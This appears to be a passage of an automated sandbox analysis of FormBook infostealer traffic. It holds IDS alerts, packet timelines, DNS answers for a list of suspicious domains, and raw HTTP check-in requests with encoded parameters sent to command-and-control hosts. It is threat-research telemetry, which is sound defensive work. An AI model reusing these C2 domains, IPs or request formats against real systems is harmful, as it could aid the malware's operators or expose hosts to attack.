2024-11-05T15:25:01.620535+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 55750 | 13.248.169.48 | 80 | TCP
2024-11-05T15:25:04.198110+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 55751 | 13.248.169.48 | 80 | TCP
2024-11-05T15:25:04.198110+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 55751 | 13.248.169.48 | 80 | TCP
2024-11-05T15:25:10.405488+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 55752 | 104.16.6.253 | 80 | TCP
                                                                            Nov 5, 2024 15:23:24.896538973 CET8055594209.74.95.29192.168.2.4
                                                                            Nov 5, 2024 15:23:24.896730900 CET8055594209.74.95.29192.168.2.4
                                                                            Nov 5, 2024 15:23:24.896902084 CET8055594209.74.95.29192.168.2.4
                                                                            Nov 5, 2024 15:23:25.564204931 CET8055594209.74.95.29192.168.2.4
                                                                            Nov 5, 2024 15:23:25.564311028 CET8055594209.74.95.29192.168.2.4
                                                                            Nov 5, 2024 15:23:25.564326048 CET8055594209.74.95.29192.168.2.4
                                                                            Nov 5, 2024 15:23:25.564380884 CET5559480192.168.2.4209.74.95.29
                                                                            Nov 5, 2024 15:23:25.564815044 CET8055594209.74.95.29192.168.2.4
                                                                            Nov 5, 2024 15:23:25.564829111 CET8055594209.74.95.29192.168.2.4
                                                                            Nov 5, 2024 15:23:25.564873934 CET5559480192.168.2.4209.74.95.29
                                                                            Nov 5, 2024 15:23:25.565268993 CET8055594209.74.95.29192.168.2.4
                                                                            Nov 5, 2024 15:23:25.565282106 CET8055594209.74.95.29192.168.2.4
                                                                            Nov 5, 2024 15:23:25.565293074 CET8055594209.74.95.29192.168.2.4
                                                                            Nov 5, 2024 15:23:25.565304995 CET8055594209.74.95.29192.168.2.4
                                                                            Nov 5, 2024 15:23:25.565326929 CET5559480192.168.2.4209.74.95.29
                                                                            Nov 5, 2024 15:23:25.565352917 CET5559480192.168.2.4209.74.95.29
                                                                            Nov 5, 2024 15:23:25.566135883 CET8055594209.74.95.29192.168.2.4
                                                                            Nov 5, 2024 15:23:25.566190004 CET5559480192.168.2.4209.74.95.29
                                                                            Nov 5, 2024 15:23:25.569329023 CET8055594209.74.95.29192.168.2.4
                                                                            Nov 5, 2024 15:23:25.569482088 CET8055594209.74.95.29192.168.2.4
                                                                            Nov 5, 2024 15:23:25.569493055 CET8055594209.74.95.29192.168.2.4
                                                                            Nov 5, 2024 15:23:25.569539070 CET5559480192.168.2.4209.74.95.29
                                                                            Nov 5, 2024 15:23:25.604131937 CET8055594209.74.95.29192.168.2.4
                                                                            Nov 5, 2024 15:23:25.604243994 CET5559480192.168.2.4209.74.95.29
                                                                            Nov 5, 2024 15:23:26.402157068 CET5559480192.168.2.4209.74.95.29
                                                                            Nov 5, 2024 15:23:27.420404911 CET5560980192.168.2.4209.74.95.29
                                                                            Nov 5, 2024 15:23:27.425525904 CET8055609209.74.95.29192.168.2.4
                                                                            Nov 5, 2024 15:23:27.425709009 CET5560980192.168.2.4209.74.95.29
                                                                            Nov 5, 2024 15:23:27.431590080 CET5560980192.168.2.4209.74.95.29
                                                                            Nov 5, 2024 15:23:27.437757015 CET8055609209.74.95.29192.168.2.4
                                                                            Nov 5, 2024 15:23:28.155177116 CET8055609209.74.95.29192.168.2.4
                                                                            Nov 5, 2024 15:23:28.155280113 CET8055609209.74.95.29192.168.2.4
                                                                            Nov 5, 2024 15:23:28.155294895 CET8055609209.74.95.29192.168.2.4
                                                                            Nov 5, 2024 15:23:28.155330896 CET5560980192.168.2.4209.74.95.29
                                                                            Nov 5, 2024 15:23:28.155759096 CET8055609209.74.95.29192.168.2.4
                                                                            Nov 5, 2024 15:23:28.155771017 CET8055609209.74.95.29192.168.2.4
                                                                            Nov 5, 2024 15:23:28.155790091 CET8055609209.74.95.29192.168.2.4
                                                                            Nov 5, 2024 15:23:28.155881882 CET5560980192.168.2.4209.74.95.29
                                                                            Nov 5, 2024 15:23:28.155894041 CET5560980192.168.2.4209.74.95.29
                                                                            Nov 5, 2024 15:23:28.156426907 CET8055609209.74.95.29192.168.2.4
                                                                            Nov 5, 2024 15:23:28.156440020 CET8055609209.74.95.29192.168.2.4
                                                                            Nov 5, 2024 15:23:28.156456947 CET8055609209.74.95.29192.168.2.4
                                                                            Nov 5, 2024 15:23:28.156483889 CET5560980192.168.2.4209.74.95.29
                                                                            Nov 5, 2024 15:23:28.157272100 CET8055609209.74.95.29192.168.2.4
                                                                            Nov 5, 2024 15:23:28.157316923 CET5560980192.168.2.4209.74.95.29
                                                                            Nov 5, 2024 15:23:28.162250996 CET8055609209.74.95.29192.168.2.4
                                                                            Nov 5, 2024 15:23:28.162492037 CET8055609209.74.95.29192.168.2.4
                                                                            Nov 5, 2024 15:23:28.162576914 CET5560980192.168.2.4209.74.95.29
                                                                            Nov 5, 2024 15:23:28.194165945 CET8055609209.74.95.29192.168.2.4
                                                                            Nov 5, 2024 15:23:28.194256067 CET5560980192.168.2.4209.74.95.29
                                                                            Nov 5, 2024 15:23:28.195265055 CET5560980192.168.2.4209.74.95.29
                                                                            Nov 5, 2024 15:23:28.202564001 CET8055609209.74.95.29192.168.2.4
                                                                            Nov 5, 2024 15:23:33.576061964 CET5564480192.168.2.4136.143.186.12
                                                                            Nov 5, 2024 15:23:33.581372976 CET8055644136.143.186.12192.168.2.4
                                                                            Nov 5, 2024 15:23:33.581469059 CET5564480192.168.2.4136.143.186.12
                                                                            Nov 5, 2024 15:23:33.592297077 CET5564480192.168.2.4136.143.186.12
                                                                            Nov 5, 2024 15:23:33.597886086 CET8055644136.143.186.12192.168.2.4
                                                                            Nov 5, 2024 15:23:34.284486055 CET8055644136.143.186.12192.168.2.4
                                                                            Nov 5, 2024 15:23:34.284665108 CET8055644136.143.186.12192.168.2.4
                                                                            Nov 5, 2024 15:23:34.284729004 CET5564480192.168.2.4136.143.186.12
                                                                            Nov 5, 2024 15:23:34.326970100 CET8055644136.143.186.12192.168.2.4
                                                                            Nov 5, 2024 15:23:34.327063084 CET5564480192.168.2.4136.143.186.12
                                                                            Nov 5, 2024 15:23:35.105376959 CET5564480192.168.2.4136.143.186.12
                                                                            Nov 5, 2024 15:23:36.124418974 CET5565980192.168.2.4136.143.186.12
                                                                            Nov 5, 2024 15:23:36.129391909 CET8055659136.143.186.12192.168.2.4
                                                                            Nov 5, 2024 15:23:36.129477978 CET5565980192.168.2.4136.143.186.12
                                                                            Nov 5, 2024 15:23:36.140371084 CET5565980192.168.2.4136.143.186.12
                                                                            Nov 5, 2024 15:23:36.145656109 CET8055659136.143.186.12192.168.2.4
                                                                            Nov 5, 2024 15:23:36.827424049 CET8055659136.143.186.12192.168.2.4
                                                                            Nov 5, 2024 15:23:36.827519894 CET8055659136.143.186.12192.168.2.4
                                                                            Nov 5, 2024 15:23:36.834522009 CET5565980192.168.2.4136.143.186.12
                                                                            Nov 5, 2024 15:23:36.870414972 CET8055659136.143.186.12192.168.2.4
                                                                            Nov 5, 2024 15:23:36.870510101 CET5565980192.168.2.4136.143.186.12
                                                                            Nov 5, 2024 15:23:37.652160883 CET5565980192.168.2.4136.143.186.12
                                                                            Nov 5, 2024 15:23:38.670649052 CET5567480192.168.2.4136.143.186.12
                                                                            Nov 5, 2024 15:23:38.675769091 CET8055674136.143.186.12192.168.2.4
                                                                            Nov 5, 2024 15:23:38.675882101 CET5567480192.168.2.4136.143.186.12
                                                                            Nov 5, 2024 15:23:38.686458111 CET5567480192.168.2.4136.143.186.12
                                                                            Nov 5, 2024 15:23:38.691458941 CET8055674136.143.186.12192.168.2.4
                                                                            Nov 5, 2024 15:23:38.691474915 CET8055674136.143.186.12192.168.2.4
                                                                            Nov 5, 2024 15:23:38.691485882 CET8055674136.143.186.12192.168.2.4
                                                                            Nov 5, 2024 15:23:38.691494942 CET8055674136.143.186.12192.168.2.4
                                                                            Nov 5, 2024 15:23:38.691509962 CET8055674136.143.186.12192.168.2.4
                                                                            Nov 5, 2024 15:23:38.691519976 CET8055674136.143.186.12192.168.2.4
                                                                            Nov 5, 2024 15:23:38.691553116 CET8055674136.143.186.12192.168.2.4
                                                                            Nov 5, 2024 15:23:38.691597939 CET8055674136.143.186.12192.168.2.4
                                                                            Nov 5, 2024 15:23:38.691606998 CET8055674136.143.186.12192.168.2.4
                                                                            Nov 5, 2024 15:23:39.363715887 CET8055674136.143.186.12192.168.2.4
                                                                            Nov 5, 2024 15:23:39.407413006 CET8055674136.143.186.12192.168.2.4
                                                                            Nov 5, 2024 15:23:39.407521009 CET5567480192.168.2.4136.143.186.12
                                                                            Nov 5, 2024 15:23:40.199044943 CET5567480192.168.2.4136.143.186.12
                                                                            Nov 5, 2024 15:23:41.218358040 CET5568680192.168.2.4136.143.186.12
                                                                            Nov 5, 2024 15:23:41.223268032 CET8055686136.143.186.12192.168.2.4
                                                                            Nov 5, 2024 15:23:41.223356962 CET5568680192.168.2.4136.143.186.12
                                                                            Nov 5, 2024 15:23:41.230813980 CET5568680192.168.2.4136.143.186.12
                                                                            Nov 5, 2024 15:23:41.236013889 CET8055686136.143.186.12192.168.2.4
                                                                            Nov 5, 2024 15:23:41.940274954 CET8055686136.143.186.12192.168.2.4
                                                                            Nov 5, 2024 15:23:41.940345049 CET8055686136.143.186.12192.168.2.4
                                                                            Nov 5, 2024 15:23:41.940356016 CET8055686136.143.186.12192.168.2.4
                                                                            Nov 5, 2024 15:23:41.940645933 CET8055686136.143.186.12192.168.2.4
                                                                            Nov 5, 2024 15:23:41.940660000 CET8055686136.143.186.12192.168.2.4
                                                                            Nov 5, 2024 15:23:41.940670967 CET8055686136.143.186.12192.168.2.4
                                                                            Nov 5, 2024 15:23:41.940689087 CET5568680192.168.2.4136.143.186.12
                                                                            Nov 5, 2024 15:23:41.940826893 CET5568680192.168.2.4136.143.186.12
                                                                            Nov 5, 2024 15:23:41.992619038 CET8055686136.143.186.12192.168.2.4
                                                                            Nov 5, 2024 15:23:41.992815971 CET5568680192.168.2.4136.143.186.12
                                                                            Nov 5, 2024 15:23:41.993711948 CET5568680192.168.2.4136.143.186.12
                                                                            Nov 5, 2024 15:23:41.998651028 CET8055686136.143.186.12192.168.2.4
                                                                            Nov 5, 2024 15:23:47.528799057 CET5572280192.168.2.4133.130.35.90
                                                                            Nov 5, 2024 15:23:47.533922911 CET8055722133.130.35.90192.168.2.4
                                                                            Nov 5, 2024 15:23:47.534003019 CET5572280192.168.2.4133.130.35.90
                                                                            Nov 5, 2024 15:23:47.544778109 CET5572280192.168.2.4133.130.35.90
                                                                            Nov 5, 2024 15:23:47.549683094 CET8055722133.130.35.90192.168.2.4
                                                                            Nov 5, 2024 15:23:48.412935972 CET8055722133.130.35.90192.168.2.4
                                                                            Nov 5, 2024 15:23:48.464607000 CET5572280192.168.2.4133.130.35.90
                                                                            Nov 5, 2024 15:23:48.551155090 CET8055722133.130.35.90192.168.2.4
                                                                            Nov 5, 2024 15:23:48.551270008 CET5572280192.168.2.4133.130.35.90
                                                                            Nov 5, 2024 15:23:49.058547020 CET5572280192.168.2.4133.130.35.90
                                                                            Nov 5, 2024 15:23:50.077721119 CET5572980192.168.2.4133.130.35.90
                                                                            Nov 5, 2024 15:23:50.082777977 CET8055729133.130.35.90192.168.2.4
                                                                            Nov 5, 2024 15:23:50.085688114 CET5572980192.168.2.4133.130.35.90
                                                                            Nov 5, 2024 15:23:50.096906900 CET5572980192.168.2.4133.130.35.90
                                                                            Nov 5, 2024 15:23:50.101878881 CET8055729133.130.35.90192.168.2.4
                                                                            Nov 5, 2024 15:23:50.978941917 CET8055729133.130.35.90192.168.2.4
                                                                            Nov 5, 2024 15:23:51.027180910 CET5572980192.168.2.4133.130.35.90
                                                                            Nov 5, 2024 15:23:51.119215965 CET8055729133.130.35.90192.168.2.4
                                                                            Nov 5, 2024 15:23:51.119297028 CET5572980192.168.2.4133.130.35.90
                                                                            Nov 5, 2024 15:23:51.605717897 CET5572980192.168.2.4133.130.35.90
                                                                            Nov 5, 2024 15:23:52.627640963 CET5573080192.168.2.4133.130.35.90
                                                                            Nov 5, 2024 15:23:52.634058952 CET8055730133.130.35.90192.168.2.4
                                                                            Nov 5, 2024 15:23:52.636512995 CET5573080192.168.2.4133.130.35.90
                                                                            Nov 5, 2024 15:23:52.651947975 CET5573080192.168.2.4133.130.35.90
                                                                            Nov 5, 2024 15:23:52.656888962 CET8055730133.130.35.90192.168.2.4
                                                                            Nov 5, 2024 15:23:52.656928062 CET8055730133.130.35.90192.168.2.4
                                                                            Nov 5, 2024 15:23:52.656940937 CET8055730133.130.35.90192.168.2.4
                                                                            Nov 5, 2024 15:23:52.656950951 CET8055730133.130.35.90192.168.2.4
                                                                            Nov 5, 2024 15:23:52.657011032 CET8055730133.130.35.90192.168.2.4
                                                                            Nov 5, 2024 15:23:52.657202005 CET8055730133.130.35.90192.168.2.4
                                                                            Nov 5, 2024 15:23:52.657280922 CET8055730133.130.35.90192.168.2.4
                                                                            Nov 5, 2024 15:23:52.657290936 CET8055730133.130.35.90192.168.2.4
                                                                            Nov 5, 2024 15:23:52.657301903 CET8055730133.130.35.90192.168.2.4
                                                                            Nov 5, 2024 15:23:53.540708065 CET8055730133.130.35.90192.168.2.4
                                                                            Nov 5, 2024 15:23:53.581374884 CET5573080192.168.2.4133.130.35.90
                                                                            Nov 5, 2024 15:23:53.678941965 CET8055730133.130.35.90192.168.2.4
                                                                            Nov 5, 2024 15:23:53.678997993 CET5573080192.168.2.4133.130.35.90
                                                                            Nov 5, 2024 15:23:54.152332067 CET5573080192.168.2.4133.130.35.90
                                                                            Nov 5, 2024 15:23:55.171365023 CET5573180192.168.2.4133.130.35.90
                                                                            Nov 5, 2024 15:23:55.176407099 CET8055731133.130.35.90192.168.2.4
                                                                            Nov 5, 2024 15:23:55.177015066 CET5573180192.168.2.4133.130.35.90
                                                                            Nov 5, 2024 15:23:55.185609102 CET5573180192.168.2.4133.130.35.90
                                                                            Nov 5, 2024 15:23:55.190433979 CET8055731133.130.35.90192.168.2.4
                                                                            Nov 5, 2024 15:23:56.084033966 CET8055731133.130.35.90192.168.2.4
                                                                            Nov 5, 2024 15:23:56.136507988 CET5573180192.168.2.4133.130.35.90
                                                                            Nov 5, 2024 15:23:56.220732927 CET8055731133.130.35.90192.168.2.4
                                                                            Nov 5, 2024 15:23:56.220855951 CET5573180192.168.2.4133.130.35.90
                                                                            Nov 5, 2024 15:23:56.221645117 CET5573180192.168.2.4133.130.35.90
                                                                            Nov 5, 2024 15:23:56.226463079 CET8055731133.130.35.90192.168.2.4
                                                                            Nov 5, 2024 15:24:01.251257896 CET5573280192.168.2.43.33.130.190
                                                                            Nov 5, 2024 15:24:01.256169081 CET80557323.33.130.190192.168.2.4
                                                                            Nov 5, 2024 15:24:01.256253958 CET5573280192.168.2.43.33.130.190
                                                                            Nov 5, 2024 15:24:01.269614935 CET5573280192.168.2.43.33.130.190
                                                                            Nov 5, 2024 15:24:01.274610043 CET80557323.33.130.190192.168.2.4
                                                                            Nov 5, 2024 15:24:01.885379076 CET80557323.33.130.190192.168.2.4
                                                                            Nov 5, 2024 15:24:01.885452032 CET5573280192.168.2.43.33.130.190
                                                                            Nov 5, 2024 15:24:02.777441025 CET5573280192.168.2.43.33.130.190
                                                                            Nov 5, 2024 15:24:02.782736063 CET80557323.33.130.190192.168.2.4
                                                                            Nov 5, 2024 15:24:03.796253920 CET5573380192.168.2.43.33.130.190
                                                                            Nov 5, 2024 15:24:03.801270008 CET80557333.33.130.190192.168.2.4
                                                                            Nov 5, 2024 15:24:03.801342010 CET5573380192.168.2.43.33.130.190
                                                                            Nov 5, 2024 15:24:03.812220097 CET5573380192.168.2.43.33.130.190
                                                                            Nov 5, 2024 15:24:03.817135096 CET80557333.33.130.190192.168.2.4
                                                                            Nov 5, 2024 15:24:05.324202061 CET5573380192.168.2.43.33.130.190
                                                                            Nov 5, 2024 15:24:05.330044031 CET80557333.33.130.190192.168.2.4
                                                                            Nov 5, 2024 15:24:05.330319881 CET5573380192.168.2.43.33.130.190
                                                                            Nov 5, 2024 15:24:06.343986034 CET5573480192.168.2.43.33.130.190
                                                                            Nov 5, 2024 15:24:06.348908901 CET80557343.33.130.190192.168.2.4
                                                                            Nov 5, 2024 15:24:06.349006891 CET5573480192.168.2.43.33.130.190
                                                                            Nov 5, 2024 15:24:06.362786055 CET5573480192.168.2.43.33.130.190
                                                                            Nov 5, 2024 15:24:06.367731094 CET80557343.33.130.190192.168.2.4
                                                                            Nov 5, 2024 15:24:06.367793083 CET80557343.33.130.190192.168.2.4
                                                                            Nov 5, 2024 15:24:06.367803097 CET80557343.33.130.190192.168.2.4
                                                                            Nov 5, 2024 15:24:06.367815018 CET80557343.33.130.190192.168.2.4
                                                                            Nov 5, 2024 15:24:06.367889881 CET80557343.33.130.190192.168.2.4
                                                                            Nov 5, 2024 15:24:06.367923021 CET80557343.33.130.190192.168.2.4
                                                                            Nov 5, 2024 15:24:06.368470907 CET80557343.33.130.190192.168.2.4
                                                                            Nov 5, 2024 15:24:06.368503094 CET80557343.33.130.190192.168.2.4
                                                                            Nov 5, 2024 15:24:06.368923903 CET80557343.33.130.190192.168.2.4
                                                                            Nov 5, 2024 15:24:07.006325960 CET80557343.33.130.190192.168.2.4
                                                                            Nov 5, 2024 15:24:07.009732008 CET5573480192.168.2.43.33.130.190
                                                                            Nov 5, 2024 15:24:07.870980024 CET5573480192.168.2.43.33.130.190
                                                                            Nov 5, 2024 15:24:07.875921965 CET80557343.33.130.190192.168.2.4
                                                                            Nov 5, 2024 15:24:08.889712095 CET5573580192.168.2.43.33.130.190
                                                                            Nov 5, 2024 15:24:08.894768000 CET80557353.33.130.190192.168.2.4
                                                                            Nov 5, 2024 15:24:08.895840883 CET5573580192.168.2.43.33.130.190
                                                                            Nov 5, 2024 15:24:08.902976990 CET5573580192.168.2.43.33.130.190
                                                                            Nov 5, 2024 15:24:08.907819986 CET80557353.33.130.190192.168.2.4
                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                            Nov 5, 2024 15:22:55.423834085 CET1.1.1.1192.168.2.40xaca7No error (0)www.wcm50.topwcm50.topCNAME (Canonical name)IN (0x0001)false
                                                                            Nov 5, 2024 15:22:55.423834085 CET1.1.1.1192.168.2.40xaca7No error (0)wcm50.top154.23.184.60A (IP address)IN (0x0001)false
                                                                            Nov 5, 2024 15:23:11.667706966 CET1.1.1.1192.168.2.40x68faName error (3)www.everycreation.shopnonenoneA (IP address)IN (0x0001)false
                                                                            Nov 5, 2024 15:23:19.782898903 CET1.1.1.1192.168.2.40xd6e3No error (0)www.onemart.site209.74.95.29A (IP address)IN (0x0001)false
                                                                            Nov 5, 2024 15:23:33.573404074 CET1.1.1.1192.168.2.40x504No error (0)www.lanxuanz.techzhs.zohosites.comCNAME (Canonical name)IN (0x0001)false
                                                                            Nov 5, 2024 15:23:33.573404074 CET1.1.1.1192.168.2.40x504No error (0)zhs.zohosites.com136.143.186.12A (IP address)IN (0x0001)false
                                                                            Nov 5, 2024 15:23:47.526007891 CET1.1.1.1192.168.2.40x4b3No error (0)www.komart.shopkomart.shopCNAME (Canonical name)IN (0x0001)false
                                                                            Nov 5, 2024 15:23:47.526007891 CET1.1.1.1192.168.2.40x4b3No error (0)komart.shop133.130.35.90A (IP address)IN (0x0001)false
                                                                            Nov 5, 2024 15:24:01.248641968 CET1.1.1.1192.168.2.40xf14cNo error (0)www.teerra.shopteerra.shopCNAME (Canonical name)IN (0x0001)false
                                                                            Nov 5, 2024 15:24:01.248641968 CET1.1.1.1192.168.2.40xf14cNo error (0)teerra.shop3.33.130.190A (IP address)IN (0x0001)false
                                                                            Nov 5, 2024 15:24:01.248641968 CET1.1.1.1192.168.2.40xf14cNo error (0)teerra.shop15.197.148.33A (IP address)IN (0x0001)false
                                                                            Nov 5, 2024 15:24:14.652101994 CET1.1.1.1192.168.2.40xebd5No error (0)www.dverkom.store31.31.196.17A (IP address)IN (0x0001)false
                                                                            Nov 5, 2024 15:24:28.442543030 CET1.1.1.1192.168.2.40xbb14No error (0)www.dalong.sitedalong.siteCNAME (Canonical name)IN (0x0001)false
                                                                            Nov 5, 2024 15:24:28.442543030 CET1.1.1.1192.168.2.40xbb14No error (0)dalong.site172.96.187.60A (IP address)IN (0x0001)false
                                                                            Nov 5, 2024 15:24:41.872518063 CET1.1.1.1192.168.2.40x9c0cNo error (0)www.030002304.xyz161.97.142.144A (IP address)IN (0x0001)false
                                                                            Nov 5, 2024 15:24:55.847809076 CET1.1.1.1192.168.2.40x8909No error (0)www.polarmuseum.info13.248.169.48A (IP address)IN (0x0001)false
                                                                            Nov 5, 2024 15:24:55.847809076 CET1.1.1.1192.168.2.40x8909No error (0)www.polarmuseum.info76.223.54.146A (IP address)IN (0x0001)false
                                                                            Nov 5, 2024 15:25:09.664222002 CET1.1.1.1192.168.2.40x47a4No error (0)www.growdigitally.nettarget.flexifunnels.comCNAME (Canonical name)IN (0x0001)false
                                                                            Nov 5, 2024 15:25:09.664222002 CET1.1.1.1192.168.2.40x47a4No error (0)target.flexifunnels.com104.16.6.253A (IP address)IN (0x0001)false
                                                                            Nov 5, 2024 15:25:09.664222002 CET1.1.1.1192.168.2.40x47a4No error (0)target.flexifunnels.com104.16.7.253A (IP address)IN (0x0001)false
• www.wcm50.top
• www.onemart.site
• www.lanxuanz.tech
• www.komart.shop
• www.teerra.shop
• www.dverkom.store
• www.dalong.site
• www.030002304.xyz
• www.polarmuseum.info
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 55454 | 154.23.184.60 | 80 | 4324 | C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exe
Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 15:22:55.444257021 CET | 534 | OUT | GET /4snq/?zhl=sdH/WbEy6w4fbVGTq9TqooXc2+84tGl6rFb6/eES0khOL/XioS6AKYaJ1BDLndLagFW2QAKxeq+tE1rAXqYu5rfm3z/1IJXzLuu54LPR0VmTOFYhtf9kUlg=&X8Rx1=znhhIbB8nN HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.9
Host: www.wcm50.top
Connection: close
User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; SGH-T889 Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Nov 5, 2024 15:22:56.420778036 CET | 312 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Tue, 05 Nov 2024 14:22:56 GMT
Content-Type: text/html
Content-Length: 148
Connection: close
ETag: "66a62026-94"
Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 55564 | 209.74.95.29 | 80 | 4324 | C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exe
Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 15:23:19.800028086 CET | 796 | OUT | POST /frpa/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate
Host: www.onemart.site
Origin: http://www.onemart.site
Connection: close
Content-Length: 200
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Referer: http://www.onemart.site/frpa/
User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; SGH-T889 Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                            Data Raw: 7a 68 6c 3d 37 36 69 66 41 73 73 2f 6f 70 44 71 64 6b 57 6e 49 46 35 6b 61 48 70 5a 4d 50 71 79 4f 36 52 37 55 4b 46 53 4d 37 2f 64 47 2f 6b 6f 42 6d 69 70 4f 55 52 64 61 36 66 54 6e 39 6d 51 7a 4f 44 2f 54 62 55 38 38 79 70 58 76 38 55 6b 50 6c 54 5a 66 35 2b 44 59 76 6b 39 6c 39 50 43 6e 64 66 41 52 57 39 58 33 38 75 37 4b 79 79 4e 74 69 69 73 64 47 7a 64 4c 46 75 70 2b 74 73 66 56 70 78 47 67 4c 62 6f 64 51 54 42 41 41 30 2f 4a 44 2f 49 30 6b 34 4d 61 61 64 56 56 57 71 58 64 71 6d 4e 32 51 75 78 45 4a 39 4f 30 35 34 53 50 70 32 77 31 4f 78 54 74 4e 4a 41 65 51 64 2b 2f 71 66 58 74 67 3d 3d
                                                                            Data Ascii: zhl=76ifAss/opDqdkWnIF5kaHpZMPqyO6R7UKFSM7/dG/koBmipOURda6fTn9mQzOD/TbU88ypXv8UkPlTZf5+DYvk9l9PCndfARW9X38u7KyyNtiisdGzdLFup+tsfVpxGgLbodQTBAA0/JD/I0k4MaadVVWqXdqmN2QuxEJ9O054SPp2w1OxTtNJAeQd+/qfXtg==
Nov 5, 2024 15:23:20.484478951 CET | 1236 | IN | HTTP/1.1 404 Not Found
Date: Tue, 05 Nov 2024 14:23:20 GMT
Server: Apache
Content-Length: 13928
Connection: close
Content-Type: text/html
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4d 61 6b 61 61 6e 20 2d 20 52 65 61 6c 20 45 73 74 61 74 65 20 48 54 4d 4c 20 54 65 6d 70 6c 61 74 65 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 46 61 76 69 63 6f 6e 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 69 6d 67 2f 66 61 76 69 63 6f 6e 2e 69 [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <title>Makaan - Real Estate HTML Template</title> <meta content="width=device-width, initial-scale=1.0" name="viewport"> <meta content="" name="keywords"> <meta content="" name="description"> ... Favicon --> <link href="img/favicon.ico" rel="icon"> ... Google Web Fonts --> <link rel="preconnect" href="https://fonts.googleapis.com"> <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin> <link href="https://fonts.googleapis.com/css2?family=Heebo:wght@400;500;600&family=Inter:wght@700;800&display=swap" rel="stylesheet"> ... Icon Font Stylesheet --> <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.10.0/css/all.min.css" rel="stylesheet"> <link href="https://cdn.jsdelivr.net/npm/bootstrap-icons@1.4.1/font/bootstrap-icons.css" rel="stylesheet"> ... Libraries Stylesheet --> <link href="lib/animate/animate.min.css" [TRUNCATED]
Nov 5, 2024 15:23:20.484637976 CET | 1236 | IN | Data Raw: 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 43 75 73 74 6f 6d 69 7a 65 64 20 42 6f 6f 74 73 74 72 61 70 20 53 74 79 6c 65 73 68 65 65 74 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65
Data Ascii: " rel="stylesheet"> ... Customized Bootstrap Stylesheet --> <link href="css/bootstrap.min.css" rel="stylesheet"> ... Template Stylesheet --> <link href="css/style.css" rel="stylesheet"></head><body> <div cl
